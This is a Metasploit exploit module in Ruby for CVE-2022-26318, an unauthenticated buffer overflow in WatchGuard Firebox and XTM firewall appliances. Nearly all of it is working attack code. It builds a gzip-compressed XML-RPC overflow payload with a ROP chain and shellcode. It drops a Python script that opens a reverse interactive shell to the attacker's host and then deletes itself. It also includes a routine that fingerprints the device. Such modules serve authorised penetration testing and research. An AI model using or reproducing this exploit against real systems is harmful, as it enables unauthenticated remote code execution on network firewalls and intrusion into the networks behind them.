<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'zlib'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = GoodRanking<br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'WatchGuard XTM Firebox Unauthenticated Remote Command Execution',<br /> 'Description' => %q{<br /> This module exploits a buffer overflow at the administration interface (8080 or 4117) of WatchGuard Firebox<br /> and XTM appliances which is built from a cherrypy python backend sending XML-RPC requests to a C binary<br /> called wgagent using pre-authentication endpoint /agent/login.<br /> This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x<br /> before 12.5.9_U2. Successful exploitation results in remote code execution as user nobody.<br /> },<br /> 'Author' => [<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module<br /> 'Charles Fol (Ambionics Security)', # discovery<br /> 'Dylan Pindur (AssetNote)', # reverse engineering of CVE-2022-26318'<br /> 'Misterxid' # POC<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2022-26318' ],<br /> [ 'URL', 'https://www.ambionics.io/blog/hacking-watchguard-firewalls' ],<br /> [ 'URL', 'https://www.assetnote.io/resources/research/diving-deeper-into-watchguard-pre-auth-rce-cve-2022-26318' ],<br /> [ 'URL', 'https://github.com/misterxid/watchguard_cve-2022-26318' ],<br /> [ 'URL', 'https://attackerkb.com/topics/t8Nrnu99ZE/cve-2022-26318' ]<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => [ 'unix' ],<br /> 'Privileged' => false,<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Targets' => [<br /> [<br /> 'Automatic (Reverse Python Interactive Shell)',<br /> {<br /> 'Platform' => [ 'unix' ],<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_python',<br /> 'SHELL' => '/usr/bin/python'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2022-08-29',<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'RPORT' => 8080<br /> },<br /> 'Notes' => {<br /> 'Stability' => [ SERVICE_RESOURCE_LOSS ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [ true, 'WatchGuard Firebox base url', '/' ])<br /> ]<br /> )<br /> end<br /><br /> def check_watchguard_firebox?<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'auth', 'login'),<br /> 'vars_get' => {<br /> 'from_page' => '/'<br /> }<br /> })<br /> return true if res && res.code == 200 && res.body.include?('Powered by WatchGuard Technologies') && res.body.include?('Firebox')<br /><br /> false<br /> end<br /><br /> def create_bof_payload<br /> # temporary filename in /tmp where python payload will be stored.<br /> @py_fname = "/tmp/#{Rex::Text.rand_text_alphanumeric(4)}.py"<br /> # xml overflow payload<br /> payload = '<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><'.encode<br /> payload << ('A' * 3181).encode<br /> payload << 'MFA>'.encode<br /> payload << ('<BBBBMFA>' * 3680).encode<br /> # padding and rop chain<br /> payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br /> payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br /> payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br /> payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br /> payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br /> payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br /> payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br /> payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br /> payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 P@\x00\x00"<br /> payload << "\x00\x00\x00h\xf9@\x00\x00\x00\x00\x00 P@\x00\x00\x00\x00\x00\x00\x00\x0e\xd6A\x00\x00\x00\x00\x00\xb1\xd5A"<br /> payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00}^@\x00\x00\x00\x00\x00"<br /> payload << "\x00\x00\x00\x00\x00\x00\x00\x00|^@\x00\x00\x00\x00\x00\xad\xd2A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br /> payload << "\x00\x00\x00\x0e\xd6A\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br /> payload << "\x00\x00\x00\x00\x00\x00\x00\x00*\xa9@\x00\x00\x00\x00\x00H\x8d=\x9d\x00\x00\x00\xbeA\x02\x00\x00\xba\xb6"<br /> payload << "\x01\x00\x00\xb8\x02\x00\x00\x00\x0f\x05H\x89\x05\x92\x00\x00\x00H\x8b\x15\x93\x00\x00\x00H\x8d5\x94\x00"<br /> payload << "\x00\x00H\x8b=}\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05H\x8b=o\x00\x00\x00\xb8\x03\x00\x00\x00\x0f\x05\xb8;"<br /> payload << "\x00\x00\x00H\x8d=?\x00\x00\x00H\x89= \x00\x00\x00H\x8d5A\x00\x00\x00H\x895\x1a\x00\x00\x00H\x8d5\x0b\x00"<br /> payload << "\x00\x001\xd2\x0f\x05\xb8<\x00\x00\x00\x0f\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br /> payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00#{datastore['SHELL']}\x00#{@py_fname}\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef"<br /> payload << "\x01\x00\x00\x00\x00\x00\x00"<br /> # shell code to launch an reverse interactive python shell<br /> # The Watchguard appliance has a very restricted linux command set, readonly root filesystem and no unix shells installed<br /> # The interactive Python shell (-i) is for now the only way to get shell access<br /> payload << 'import socket;from subprocess import call; from os import dup2;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'.encode<br /> payload << "s.connect((\"#{datastore['LHOST']}\",#{datastore['LPORT']})); dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);".encode<br /> payload << "call([\"#{datastore['SHELL']}\",\"-i\"]);".encode<br /> payload << "import os; os.remove(\"#{@py_fname}\");".encode<br /> return Zlib.gzip(payload)<br /> end<br /><br /> def check<br /> print_status("Checking if #{peer} can be exploited.")<br /> return CheckCode::Detected if check_watchguard_firebox?<br /><br /> CheckCode::Safe<br /> end<br /><br /> def exploit<br /> print_status("#{peer} - Attempting to exploit...")<br /> bof_payload = create_bof_payload<br /> print_status("#{peer} - Sending payload...")<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'agent', 'login'),<br /> 'headers' => {<br /> 'Accept-Encoding' => 'gzip, deflate',<br /> 'Content-Encoding' => 'gzip'<br /> },<br /> 'data' => bof_payload<br /> })<br /> end<br />end<br /></code></pre>